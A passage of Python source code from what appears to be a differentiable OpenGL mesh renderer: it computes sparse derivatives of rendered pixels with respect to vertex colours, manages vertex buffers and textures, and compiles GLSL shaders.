result_wrt_vc_bnd_outside_edge = sp.csc_matrix((data, ij), shape=(width * height * num_channels, vc_size))
# result_wrt_vc_bnd_outside_edge.sum_duplicates()
######## 7 derivatives samples inside wrt vc : (bar)/ nsamples for faces sample
dImage_wrt_outside_vc_inside = sampleBarycentric[facesInsideBnd] / self.nsamples
### Derivatives wrt VC:
# Each pixel relies on three verts
pixels = np.tile(np.where(boundaryImage.ravel())[0][None,:], [self.nsamples, 1])[facesInsideBnd]
IS = np.tile(col(pixels), (1, 3)).ravel()
faces = f[sampleFaces[facesInsideBnd]].ravel()
JS = col(faces)
data = dImage_wrt_outside_vc_inside.ravel()
IS = np.concatenate([IS * num_channels + k for k in range(num_channels)])
JS = np.concatenate([JS * num_channels + k for k in range(num_channels)])
data = np.concatenate([data for i in range(num_channels)])
ij = np.vstack((IS.ravel(), JS.ravel()))
result_wrt_vc_bnd_inside = sp.csc_matrix((data, ij), shape=(width * height * num_channels, vc_size))
# result_wrt_vc_bnd_inside.sum_duplicates()
########### Non boundary derivatives: ####################
nNonBndFaces = nonBoundaryFaces.size
verticesNonBnd = self.v.r[f[nonBoundaryFaces].ravel()]
# barySample = self.renders_sample_barycentric[0].reshape([-1,3])[(~boundaryImage)&(visibility !=4294967295 ).ravel().astype(np.bool), :]
bc = barycentric[((~boundaryImage)&(visibility !=4294967295 ))].reshape((-1, 3))
# barySample[barycentric[((~boundaryImage)&(visibility !=4294967295 ))].reshape((-1, 3))]
### Derivatives wrt VC:
# Each pixel relies on three verts
pixels = np.where(((~boundaryImage)&(visibility !=4294967295 )).ravel())[0]
IS = np.tile(col(pixels), (1, 3)).ravel()
JS = col(f[nonBoundaryFaces].ravel())
bc = barycentric[((~boundaryImage) & (visibility != 4294967295))].reshape((-1, 3))
# bc = barySample.reshape((-1, 3))
data = np.asarray(bc, order='C').ravel()
IS = np.concatenate([IS * num_channels + k for k in range(num_channels)])
JS = np.concatenate([JS * num_channels + k for k in range(num_channels)])
data = np.concatenate([data for i in range(num_channels)])
# IS = np.concatenate((IS*3, IS*3+1, IS*3+2))
# JS = np.concatenate((JS*3, JS*3+1, JS*3+2))
# data = np.concatenate((data, data, data))
ij = np.vstack((IS.ravel(), JS.ravel()))
result = sp.csc_matrix((data, ij), shape=(width * height * num_channels, vc_size))
result_wrt_vc_nonbnd = result
# result_wrt_vc_nonbnd.sum_duplicates()
if np.any(boundaryImage):
# result_wrt_verts = result_wrt_verts_bar_outside_edge
# result_wrt_verts = result_wrt_verts_nonbnd
result_wrt_vc = result_wrt_vc_bnd_outside + result_wrt_vc_bnd_outside_edge + result_wrt_vc_bnd_inside + result_wrt_vc_nonbnd
# result_wrt_vc = sp.csc_matrix((width * height * num_channels, vc_size))
else:
# result_wrt_verts = sp.csc_matrix((image_width*image_height*n_channels, num_verts*2))
result_wrt_vc = result_wrt_vc_nonbnd
# result_wrt_vc = sp.csc_matrix((width * height * num_channels, vc_size))
return result_wrt_vc
def on_changed(self, which):
super().on_changed(which)
if 'v' or 'camera' in which:
for mesh in range(len(self.f_list)):
for polygons in range(len(self.f_list[mesh])):
f = self.f_list[mesh][polygons]
verts_by_face = np.asarray(self.v_list[mesh].reshape((-1, 3))[f.ravel()], dtype=np.float32, order='C')
self.vbo_verts_mesh[mesh][polygons].set_array(verts_by_face.astype(np.float32))
self.vbo_verts_mesh[mesh][polygons].bind()
if 'vc' in which:
for mesh in range(len(self.f_list)):
for polygons in range(len(self.f_list[mesh])):
f = self.f_list[mesh][polygons]
colors_by_face = np.asarray(self.vc_list[mesh].reshape((-1, 3))[f.ravel()], dtype=np.float32, order='C')
self.vbo_colors_mesh[mesh][polygons].set_array(colors_by_face.astype(np.float32))
self.vbo_colors_mesh[mesh][polygons].bind()
if 'f' in which:
self.vbo_indices.set_array(self.f.astype(np.uint32))
self.vbo_indices.bind()
self.vbo_indices_range.set_array(np.arange(self.f.size, dtype=np.uint32).ravel())
self.vbo_indices_range.bind()
flen = 1
for mesh in range(len(self.f_list)):
for polygons in range(len(self.f_list[mesh])):
f = self.f_list[mesh][polygons]
# fc = np.arange(flen, flen + len(f))
fc = np.tile(np.arange(flen, flen + len(f))[:, None], [1, 3]).ravel()
# fc[:, 0] = fc[:, 0] & 255
# fc[:, 1] = (fc[:, 1] >> 8) & 255
# fc[:, 2] = (fc[:, 2] >> 16) & 255
fc = np.asarray(fc, dtype=np.uint32)
self.vbo_face_ids_list[mesh][polygons].set_array(fc)
self.vbo_face_ids_list[mesh][polygons].bind()
flen += len(f)
self.vbo_indices_mesh_list[mesh][polygons].set_array(np.array(self.f_list[mesh][polygons]).astype(np.uint32))
self.vbo_indices_mesh_list[mesh][polygons].bind()
if 'texture_stack' in which:
# gl = self.glf
# texture_data = np.array(self.texture_image*255., dtype='uint8', order='C')
# self.release_textures()
#
# for mesh in range(len(self.f_list)):
# textureIDs = []
# for polygons in range(len(self.f_list[mesh])):
# texture = None
# if self.haveUVs_list[mesh][polygons]:
# texture = GL.GLuint(0)
# GL.glGenTextures( 1, texture )
# GL.glPixelStorei(GL.GL_UNPACK_ALIGNMENT,1)
# GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MAG_FILTER, GL.GL_LINEAR)
# GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MIN_FILTER, GL.GL_LINEAR_MIPMAP_LINEAR)
# GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_BASE_LEVEL, 0)
# GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MAX_LEVEL, 0)
# GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_WRAP_S, GL.GL_REPEAT)
# GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_WRAP_T, GL.GL_REPEAT)
# GL.glBindTexture(GL.GL_TEXTURE_2D, texture)
# #Send texture.
# #Pol: Check if textures are float or uint from Blender import.
# image = (self.textures_list[mesh][polygons]*255.0).astype(np.uint8)
# GL.glTexImage2D(GL.GL_TEXTURE_2D, 0, GL.GL_RGB8, image.shape[1], image.shape[0], 0, GL.GL_RGB, GL.GL_UNSIGNED_BYTE, image)
# textureIDs = textureIDs + [texture]
# self.textureID_mesh_list = self.textureID_mesh_list + [textureIDs]
# gl.GenTextures(1, tmp) # TODO: free after done
# self.textureID = tmp[0]
if self.initialized:
textureCoordIdx = 0
for mesh in range(len(self.f_list)):
for polygons in range(len(self.f_list[mesh])):
texture = None
if self.haveUVs_list[mesh][polygons]:
texture = self.textureID_mesh_list[mesh][polygons]
GL.glBindTexture(GL.GL_TEXTURE_2D, texture)
#Update the OpenGL textures with all the textures. (Inefficient as many might not have changed).
image = np.array(np.flipud((self.textures_list[mesh][polygons] * 255.0)), order='C', dtype=np.uint8)
self.textures_list[mesh][polygons] = self.texture_stack[textureCoordIdx:image.size+textureCoordIdx].reshape(image.shape)
textureCoordIdx = textureCoordIdx + image.size
image = np.array(np.flipud((self.textures_list[mesh][polygons] * 255.0)), order='C', dtype=np.uint8)
GL.glTexSubImage2D(GL.GL_TEXTURE_2D, 0, 0, 0, image.shape[1], image.shape[0], GL.GL_RGB, GL.GL_UNSIGNED_BYTE,
image.reshape([image.shape[1], image.shape[0], -1]).ravel().tostring())
if 'v' or 'f' or 'vc' or 'ft' or 'camera' or 'texture_stack' in which:
self.render_image_buffers()
def release_textures(self):
if hasattr(self, 'textureID_mesh_list'):
if self.textureID_mesh_list != []:
for texture_mesh in self.textureID_mesh_list:
if texture_mesh != []:
for texture in texture_mesh:
if texture != None:
GL.glDeleteTextures(1, [texture.value])
self.textureID_mesh_list = []
@depends_on(dterms+terms)
def color_image(self):
self._call_on_changed()
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_FILL)
no_overdraw = self.draw_color_image(with_vertex_colors=True, with_texture_on=True)
return no_overdraw
# if not self.overdraw:
# return no_overdraw
#
# GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_LINE)
# overdraw = self.draw_color_image()
# GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_FILL)
#
# # return overdraw * np.atleast_3d(self.boundarybool_image)
#
# boundarybool_image = self.boundarybool_image
# if self.num_channels > 1:
# boundarybool_image = np.atleast_3d(boundarybool_image)
#
# return np.asarray((overdraw*boundarybool_image + no_overdraw*(1-boundarybool_image)), order='C')
@depends_on('f', 'frustum', 'camera', 'overdraw')
def barycentric_image(self):
self._call_on_changed()
# Overload method to call without overdraw.
return self.draw_barycentric_image(self.boundarybool_image if self.overdraw else None)
@depends_on('f', 'frustum', 'camera', 'overdraw')
def visibility_image(self):
self._call_on_changed()
#Overload method to call without overdraw.
return self.draw_visibility_image(self.v.r, self.f, self.boundarybool_image if self.overdraw else None)
def image_mesh_bool(self, meshes):
self.makeCurrentContext()
self._call_on_changed()
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_FILL)
self._call_on_changed()
GL.glClearColor(0.,0.,0., 1.)
# use face colors if given
# FIXME: this won't work for 2 channels
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo)
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
GL.glUseProgram(self.colorProgram)
for mesh in meshes:
self.draw_index(mesh)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, self.fbo)
GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT0)
result = np.flipud(np.frombuffer(GL.glReadPixels( 0,0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_UNSIGNED_BYTE), np.uint8).reshape(self.frustum['height'],self.frustum['height'],3).astype(np.uint32))[:,:,0]
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo)
return result!=0
@depends_on(dterms+terms)
def indices_image(self):
self._call_on_changed()
self.makeCurrentContext()
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_FILL)
self._call_on_changed()
GL.glClearColor(0.,0.,0., 1.)
# use face colors if given
# FIXME: this won't work for 2 channels
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo)
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
GL.glUseProgram(self.colorProgram)
for index in range(len(self.f_list)):
self.draw_index(index)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, self.fbo)
GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT0)
result = np.flipud(np.frombuffer(GL.glReadPixels( 0,0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_UNSIGNED_BYTE), np.uint8).reshape(self.frustum['height'],self.frustum['height'],3).astype(np.uint32))[:,:,0]
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo)
return result
def draw_index(self, index):
mesh = index
view_mtx = self.camera.openglMat.dot(np.asarray(np.vstack((self.camera.view_matrix, np.array([0, 0, 0, 1]))),np.float32))
MVP = np.dot(self.projectionMatrix, view_mtx)
vc = self.vc_list[mesh]
for polygons in np.arange(len(self.f_list[mesh])):
vao_mesh = self.vao_tex_mesh_list[mesh][polygons]
GL.glBindVertexArray(vao_mesh)
f = self.f_list[mesh][polygons]
vbo_color = self.vbo_colors_mesh[mesh][polygons]
colors_by_face = np.asarray(vc.reshape((-1, 3))[f.ravel()], dtype=np.float32, order='C')
colors = np.array(np.ones_like(colors_by_face) * (index) / 255.0, dtype=np.float32)
# Pol: Make a static zero vbo_color to make it more efficient?
vbo_color.set_array(colors)
vbo_f = self.vbo_indices_mesh_list[mesh][polygons]
vbo_color.bind()
if self.f.shape[1]==2:
primtype = GL.GL_LINES
else:
primtype = GL.GL_TRIANGLES
GL.glUniformMatrix4fv(self.MVP_location, 1, GL.GL_TRUE, MVP)
GL.glDrawArrays(primtype, 0, len(vbo_f) * vbo_f.data.shape[1])
def draw_texcoord_image(self, v, f, ft, boundarybool_image=None):
# gl = glf
# gl.Disable(GL_TEXTURE_2D)
# gl.DisableClientState(GL_TEXTURE_COORD_ARR
self.makeCurrentContext()
shaders.glUseProgram(self.colorProgram)
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo)
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
# want vtc: texture-coordinates per vertex (not per element in vc)
colors = ft
#use the third channel to identify the corresponding textures.
color3 = np.vstack([np.ones([self.ft_list[mesh].shape[0],1])*mesh for mesh in range(len(self.ft_list))]).astype(np.float32) / len(self.ft_list)
colors = np.asarray(np.hstack((colors, color3)), np.float64, order='C')
self.draw_colored_primitives(self.vao_dyn, v, f, colors)
#Why do we need this?
if boundarybool_image is not None:
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_LINE)
self.draw_colored_primitives(self.vao_dyn, v, f, colors)
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_FILL)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, self.fbo)
GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT0)
result = np.flipud(np.frombuffer(GL.glReadPixels( 0,0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_UNSIGNED_BYTE), np.uint8).reshape(self.frustum['height'],self.frustum['height'],3)[:,:,:3].astype(np.float64))/255.0
result[:,:,1] = 1. - result[:,:,1]
return result
@depends_on('ft', 'textures')
def mesh_tex_coords(self):
ftidxs = self.ft.ravel()
data = self.ft
# Pol: careful with this:
data[:,1] = 1.0 - 1.0*data[:,1]
return data
# Depends on 'f' because vpe/fpe depend on f
# Pol: Check that depends on works on other attributes that depend_on x, if x changes.
@depends_on( 'ft', 'f')
def wireframe_tex_coords(self):
print("wireframe_tex_coords is being computed!")
vvt = np.zeros((self.v.r.size/3,2), dtype=np.float64, order='C')
vvt[self.f.flatten()] = self.mesh_tex_coords
edata = np.zeros((self.vpe.size,2), dtype=np.float64, order='C')
edata = vvt[self.ma.ravel()]
return edata
# TODO: can this not be inherited from base? turning off texture mapping in that instead?
@depends_on(dterms+terms)
def boundaryid_image(self):
self._call_on_changed()
# self.texture_mapping_of
self.makeCurrentContext()
GL.glUseProgram(self.colorProgram)
result = self.draw_boundaryid_image(self.v.r, self.f, self.vpe, self.fpe, self.camera)
GL.glUseProgram(self.colorTextureProgram)
# self.texture_mapping_on(with_vertex_colors=True)
return result
def draw_color_image(self, with_vertex_colors=True, with_texture_on=True):
self.makeCurrentContext()
self._call_on_changed()
GL.glEnable(GL.GL_MULTISAMPLE)
if hasattr(self, 'bgcolor'):
GL.glClearColor(self.bgcolor.r[0], self.bgcolor.r[1%self.num_channels], self.bgcolor.r[2%self.num_channels], 1.)
# use face colors if given
# FIXME: this won't work for 2 channels
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo)
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
if self.msaa:
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo_ms)
else:
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo_noms)
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
view_mtx = self.camera.openglMat.dot(np.asarray(np.vstack((self.camera.view_matrix, np.array([0, 0, 0, 1]))),np.float32))
MVP = np.dot(self.projectionMatrix, view_mtx)
for mesh in range(len(self.f_list)):
for polygons in np.arange(len(self.f_list[mesh])):
vao_mesh = self.vao_tex_mesh_list[mesh][polygons]
vbo_f = self.vbo_indices_mesh_list[mesh][polygons]
GL.glBindVertexArray(vao_mesh)
f = self.f_list[mesh][polygons]
verts_by_face = np.asarray(self.v_list[mesh].reshape((-1, 3))[f.ravel()], dtype=np.float32, order='C')
vbo_color = self.vbo_colors_mesh[mesh][polygons]
colors_by_face = np.asarray(self.vc_list[mesh].reshape((-1, 3))[f.ravel()], dtype=np.float32, order='C')
vc = colors_by_face
if with_vertex_colors:
colors = vc.astype(np.float32)
else:
# Only texture.
colors = np.ones_like(vc).astype(np.float32)
# Pol: Make a static zero vbo_color to make it more efficient?
vbo_color.set_array(colors)
vbo_color.bind()
if self.f.shape[1]==2:
primtype = GL.GL_LINES
else:
primtype = GL.GL_TRIANGLES
if with_texture_on and self.haveUVs_list[mesh][polygons]:
GL.glUseProgram(self.colorTextureProgram)
texture = self.textureID_mesh_list[mesh][polygons]
GL.glActiveTexture(GL.GL_TEXTURE0)
GL.glBindTexture(GL.GL_TEXTURE_2D, texture)
GL.glUniform1i(self.textureID, 0)
else:
GL.glUseProgram(self.colorProgram)
GL.glUniformMatrix4fv(self.MVP_texture_location, 1, GL.GL_TRUE, MVP)
GL.glDrawArrays(primtype, 0, len(vbo_f) * vbo_f.data.shape[1])
# GL.glDrawElements(primtype, len(vbo_f)*vbo_f.data.shape[1], GL.GL_UNSIGNED_INT, None)
if self.msaa:
GL.glBindFramebuffer(GL.GL_READ_FRAMEBUFFER, self.fbo_ms)
else:
GL.glBindFramebuffer(GL.GL_READ_FRAMEBUFFER, self.fbo_noms)
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo)
GL.glBlitFramebuffer(0, 0, self.frustum['width'], self.frustum['height'], 0, 0, self.frustum['width'], self.frustum['height'], GL.GL_COLOR_BUFFER_BIT, GL.GL_LINEAR)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, self.fbo)
GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT0)
result = np.flipud(np.frombuffer(GL.glReadPixels( 0,0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_UNSIGNED_BYTE), np.uint8).reshape(self.frustum['height'],self.frustum['height'],3).astype(np.float64))/255.0
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo)
GL.glDisable(GL.GL_MULTISAMPLE)
GL.glClearColor(0.,0.,0., 1.)
if hasattr(self, 'background_image'):
bg_px = np.tile(np.atleast_3d(self.visibility_image) == 4294967295, (1,1,3))
fg_px = 1 - bg_px
result = bg_px * self.background_image + fg_px * result
return result
@depends_on('ft', 'f', 'frustum', 'camera')
def texcoord_image_quantized(self):
texcoord_image = self.texcoord_image[:,:, :2].copy()
#Temprary:
self.texture_image = self.textures_list[0][0].r.copy()
texcoord_image[:,:,0] *= self.texture_image.shape[1]-1
texcoord_image[:,:,1] *= self.texture_image.shape[0]-1
texture_idx = (self.texcoord_image[:,:,2]*len(self.ft_list)).astype(np.uint32)
texcoord_image = np.round(texcoord_image)
texcoord_image = texcoord_image[:,:,0] + texcoord_image[:,:,1]*self.texture_image.shape[1]
return texcoord_image, texture_idx
def checkBufferNum(self):
GL.glGenBuffers(1)
@depends_on('ft', 'f', 'frustum', 'camera')
def texcoord_image(self):
return self.draw_texcoord_image(self.v.r, self.f, self.ft, self.boundarybool_image if self.overdraw else None)
class AnalyticRendererOpenDR(ColoredRenderer):
terms = 'f', 'frustum', 'vt', 'ft', 'background_image', 'overdraw', 'ft_list', 'haveUVs_list', 'textures_list', 'vc_list' , 'imageGT'
dterms = 'vc', 'camera', 'bgcolor', 'texture_stack', 'v'
def __init__(self):
super().__init__()
def clear(self):
try:
GL.glFlush()
GL.glFinish()
# print ("Clearing textured renderer.")
# for msh in self.vbo_indices_mesh_list:
# for vbo in msh:
# vbo.set_array([])
[vbo.set_array(np.array([])) for sublist in self.vbo_indices_mesh_list for vbo in sublist]
[vbo.bind() for sublist in self.vbo_indices_mesh_list for vbo in sublist]
[vbo.unbind() for sublist in self.vbo_indices_mesh_list for vbo in sublist]
[vbo.delete() for sublist in self.vbo_indices_mesh_list for vbo in sublist]
[vbo.set_array(np.array([])) for sublist in self.vbo_colors_mesh for vbo in sublist]
[vbo.bind() for sublist in self.vbo_colors_mesh for vbo in sublist]
[vbo.unbind() for sublist in self.vbo_colors_mesh for vbo in sublist]
[vbo.delete() for sublist in self.vbo_colors_mesh for vbo in sublist]
[vbo.set_array(np.array([])) for sublist in self.vbo_verts_mesh for vbo in sublist]
[vbo.bind() for sublist in self.vbo_verts_mesh for vbo in sublist]
[vbo.unbind() for sublist in self.vbo_verts_mesh for vbo in sublist]
[vbo.delete() for sublist in self.vbo_verts_mesh for vbo in sublist]
[vbo.set_array(np.array([])) for sublist in self.vbo_uvs_mesh for vbo in sublist]
[vbo.bind() for sublist in self.vbo_uvs_mesh for vbo in sublist]
[vbo.unbind() for sublist in self.vbo_uvs_mesh for vbo in sublist]
[vbo.delete() for sublist in self.vbo_uvs_mesh for vbo in sublist]
[vbo.set_array(np.array([])) for sublist in self.vbo_face_ids_list for vbo in sublist]
[vbo.bind() for sublist in self.vbo_face_ids_list for vbo in sublist]
[vbo.unbind() for sublist in self.vbo_face_ids_list for vbo in sublist]
[vbo.delete() for sublist in self.vbo_face_ids_list for vbo in sublist]
[GL.glDeleteVertexArrays(1, [vao.value]) for sublist in self.vao_tex_mesh_list for vao in sublist]
self.release_textures()
if self.glMode == 'glfw':
import glfw
glfw.make_context_current(self.win)
GL.glDeleteProgram(self.colorTextureProgram)
super().clear()
except:
import pdb
pdb.set_trace()
print("Program had not been initialized")
def initGLTexture(self):
print("Initializing Texture OpenGL.")
FRAGMENT_SHADER = shaders.compileShader("""#version 330 core
// Interpolated values from the vertex shaders
//#extension GL_EXT_shader_image_load_store : enable
in vec3 theColor;
in vec2 UV;
uniform sampler2D myTextureSampler;
// Ouput data
out vec3 color;
void main(){
color = theColor * texture2D( myTextureSampler, UV).rgb;
}""", GL.GL_FRAGMENT_SHADER)
VERTEX_SHADER = shaders.compileShader("""#version 330 core
// Input vertex data, different for all executions of this shader.
layout (location = 0) in vec3 position;
layout (location = 1) in vec3 color;
layout(location = 2) in vec2 vertexUV;
uniform mat4 MVP;
out vec3 theColor;
out vec2 UV;
// Values that stay constant for the whole mesh.
void main(){
// Output position of the vertex, in clip space : MVP * position
gl_Position = MVP* vec4(position,1);
theColor = color;
UV = vertexUV;
}""", GL.GL_VERTEX_SHADER)
self.colorTextureProgram = shaders.compileProgram(VERTEX_SHADER,FRAGMENT_SHADER)
#Define the other VAO/VBOs and shaders.
#Text VAO and bind color, vertex indices AND uvbuffer:
position_location = GL.glGetAttribLocation(self.colorTextureProgram, 'position')
color_location = GL.glGetAttribLocation(self.colorTextureProgram, 'color')
uvs_location = GL.glGetAttribLocation(self.colorTextureProgram, 'vertexUV')
# color_location_ub = GL.glGetAttribLocation(self.colorProgram, 'color')
self.MVP_texture_location = GL.glGetUniformLocation(self.colorTextureProgram, 'MVP')
self.vbo_indices_mesh_list = []
self.vbo_colors_mesh = []
self.vbo_verts_mesh = []
self.vao_tex_mesh_list = []
self.vbo_uvs_mesh = []
self.textureID_mesh_list = []
# GL.glEnable(GL.GL_LINE_SMOOTH)
# GL.glHint(GL.GL_LINE_SMOOTH_HINT, GL.GL_NICEST)
GL.glLineWidth(2.)
for mesh in range(len(self.f_list)):
vaos_mesh = []
vbo_indices_mesh = []
vbo_face_ids_mesh = []
vbo_colors_mesh = []
vbo_vertices_mesh = []
vbo_uvs_mesh = []
textureIDs_mesh = []
for polygons in range(len(self.f_list[mesh])):
vao = GL.GLuint(0)
GL.glGenVertexArrays(1, vao)
GL.glBindVertexArray(vao)
f = self.f_list[mesh][polygons]
verts_by_face = np.asarray(self.v_list[mesh].reshape((-1, 3))[f.ravel()], dtype=np.float32, order='C')
vbo_verts = vbo.VBO(np.array(verts_by_face).astype(np.float32))
colors_by_face = np.asarray(self.vc_list[mesh].reshape((-1, 3))[f.ravel()], dtype=np.float32, order='C')
vbo_colors = vbo.VBO(np.array(colors_by_face).astype(np.float32))
uvs_by_face = np.asarray(self.ft_list[mesh].reshape((-1, 2))[f.ravel()], dtype=np.float32, order='C')
vbo_uvs = vbo.VBO(np.array(uvs_by_face).astype(np.float32))
vbo_indices = vbo.VBO(np.array(self.f_list[mesh][polygons]).astype(np.uint32), target=GL.GL_ELEMENT_ARRAY_BUFFER)
vbo_indices.bind()
vbo_verts.bind()
GL.glEnableVertexAttribArray(position_location) # from 'location = 0' in shader
GL.glVertexAttribPointer(position_location, 3, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
vbo_colors.bind()
GL.glEnableVertexAttribArray(color_location) # from 'location = 0' in shader
GL.glVertexAttribPointer(color_location, 3, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
if self.haveUVs_list[mesh][polygons]:
vbo_uvs.bind()
GL.glEnableVertexAttribArray(uvs_location) # from 'location = 0' in shader
GL.glVertexAttribPointer(uvs_location, 2, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
#Textures:
texture = None
if self.haveUVs_list[mesh][polygons]:
texture = GL.GLuint(0)
GL.glGenTextures( 1, texture )
GL.glPixelStorei(GL.GL_UNPACK_ALIGNMENT,1)
GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MAG_FILTER, GL.GL_LINEAR)
GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MIN_FILTER, GL.GL_LINEAR_MIPMAP_LINEAR)
GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_BASE_LEVEL, 0)
GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MAX_LEVEL, 0)
GL.glBindTexture(GL.GL_TEXTURE_2D, texture)
image = np.array(np.flipud((self.textures_list[mesh][polygons])), order='C', dtype=np.float32)
GL.glTexStorage2D(GL.GL_TEXTURE_2D, 1, GL.GL_RGB32F, image.shape[1], image.shape[0])
GL.glTexSubImage2D(GL.GL_TEXTURE_2D, 0, 0, 0, image.shape[1], image.shape[0], GL.GL_RGB, GL.GL_FLOAT, image)
# GL.glTexSubImage2D(GL.GL_TEXTURE_2D, 0, 0, 0, image.shape[1], image.shape[0], GL.GL_RGB, GL.GL_FLOAT, image.reshape([image.shape[1], image.shape[0], -1]).ravel().tostring())
textureIDs_mesh = textureIDs_mesh + [texture]
vbo_indices_mesh = vbo_indices_mesh + [vbo_indices]
vbo_colors_mesh = vbo_colors_mesh + [vbo_colors]
vbo_vertices_mesh = vbo_vertices_mesh + [vbo_verts]
vbo_uvs_mesh = vbo_uvs_mesh + [vbo_uvs]
vaos_mesh = vaos_mesh + [vao]
self.textureID_mesh_list = self.textureID_mesh_list + [textureIDs_mesh]
self.vao_tex_mesh_list = self.vao_tex_mesh_list + [vaos_mesh]
self.vbo_indices_mesh_list = self.vbo_indices_mesh_list + [vbo_indices_mesh]
self.vbo_colors_mesh = self.vbo_colors_mesh + [vbo_colors_mesh]
self.vbo_verts_mesh = self.vbo_verts_mesh + [vbo_vertices_mesh]
self.vbo_uvs_mesh = self.vbo_uvs_mesh + [vbo_uvs_mesh]
GL.glBindTexture(GL.GL_TEXTURE_2D, 0)
GL.glBindVertexArray(0)
self.textureID = GL.glGetUniformLocation(self.colorTextureProgram, "myTextureSampler")
def initGL_AnalyticRenderer(self):
self.initGLTexture()
self.updateRender = True
self.updateDerivatives = True
GL.glEnable(GL.GL_MULTISAMPLE)
# GL.glHint(GL.GL_MULTISAMPLE_FILTER_HINT_NV, GL.GL_NICEST);
GL.glEnable(GL.GL_SAMPLE_SHADING)
GL.glMinSampleShading(1.0)
VERTEX_SHADER = shaders.compileShader("""#version 330 core
// Input vertex data, different for all executions of this shader.
layout (location = 0) in vec3 position;
layout (location = 1) in vec3 colorIn;
layout(location = 2) in vec2 vertexUV;
layout(location = 3) in uint face_id;
layout(location = 4) in vec3 barycentric;
uniform mat4 MVP;
out vec3 theColor;
out vec4 pos;
flat out uint face_out;
out vec3 barycentric_vert_out;
out vec2 UV;
// Values that stay constant for the whole mesh.
void main(){
// Output position of the vertex, in clip space : MVP * position
gl_Position = MVP* vec4(position,1);
pos = MVP * vec4(position,1);
//pos = pos4.xyz;
theColor = colorIn;
UV = vertexUV;
face_out = face_id;
barycentric_vert_out = barycentric;
}""", GL.GL_VERTEX_SHADER)
ERRORS_FRAGMENT_SHADER = shaders.compileShader("""#version 330 core
#extension GL_ARB_explicit_uniform_location : enable
#extension GL_ARB_explicit_attrib_location : enable
//layout(early_fragment_tests) in;
// Interpolated values from the vertex shaders
in vec3 theColor;
in vec2 UV;
flat in uint face_out;
in vec4 pos;
in vec3 barycentric_vert_out;
layout(location = 3) uniform sampler2D myTextureSampler;
uniform float ww;
uniform float wh;
// Ouput data
layout(location = 0) out vec3 color;
layout(location = 1) out vec2 sample_pos;
layout(location = 2) out uint sample_face;
layout(location = 3) out vec2 barycentric1;
layout(location = 4) out vec2 barycentric2;
void main(){
vec3 finalColor = theColor * texture2D( myTextureSampler, UV).rgb;
color = finalColor.rgb;
sample_pos = ((0.5*pos.xy/pos.w) + 0.5)*vec2(ww,wh);
sample_face = face_out;
barycentric1 = barycentric_vert_out.xy;
barycentric2 = vec2(barycentric_vert_out.z, 0.);
}""", GL.GL_FRAGMENT_SHADER)
self.errorTextureProgram = shaders.compileProgram(VERTEX_SHADER, ERRORS_FRAGMENT_SHADER)
FETCH_VERTEX_SHADER = shaders.compileShader("""#version 330 core
// Input vertex data, different for all executions of this shader.
void main() {}
""", GL.GL_VERTEX_SHADER)
FETCH_GEOMETRY_SHADER = shaders.compileShader("""#version 330 core
layout(points) in;
layout(triangle_strip, max_vertices = 4) out;
const vec2 data[4] = vec2[]
(
vec2(-1.0, 1.0),
vec2(-1.0, -1.0),
vec2( 1.0, 1.0),
vec2( 1.0, -1.0)
);
void main() {
for (int i = 0; i < 4; ++i) {
gl_Position = vec4( data[i], 0.0, 1.0 );
EmitVertex();
}
EndPrimitive();
}""", GL.GL_GEOMETRY_SHADER)
